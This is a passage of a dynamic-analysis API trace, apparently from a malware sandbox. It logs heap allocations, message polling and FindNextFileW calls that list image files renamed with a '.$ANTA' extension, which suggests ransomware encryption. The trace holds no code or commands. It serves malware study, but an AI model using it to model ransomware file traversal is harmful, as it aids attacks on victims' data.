(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.010] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.010] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0096.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0096.011] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.011] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.011] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324f12e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x324f12e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x330dc9a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x14b90, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="6EeiE520t8A11Pm.jpg.$ANTA", cAlternateFileName="6EEIE5~1.$AN")) returned 1 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0096.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.012] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.012] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.013] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.013] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.013] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x343f059, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x343f059, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x348b552, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x6f50, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="7mFkSCM1jm586Ad_.png.$ANTA", cAlternateFileName="7MFKSC~1.$AN")) returned 1 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0096.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0096.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.014] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.014] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0096.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0096.015] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.015] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.015] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc76e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x35bc76e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x367c60e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xc720, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="7yKccLuS8OBSzjABi0L.bmp.$ANTA", cAlternateFileName="7YKCCL~1.$AN")) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.015] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0096.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0096.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.016] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0096.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0096.016] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.016] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.016] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3903b75, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x3903b75, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x39e8980, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x9eb0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="9Y-cpSQgv6l3vMS-rl5.png.$ANTA", cAlternateFileName="9Y-CPS~1.$AN")) returned 1 [0096.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0096.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0096.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.017] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.055] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.055] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.055] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.055] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b66053, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x3b66053, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x3c4afdc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x10cb0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="AsLbgf0HCR8rP.jpg.$ANTA", cAlternateFileName="ASLBGF~1.$AN")) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.056] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.056] 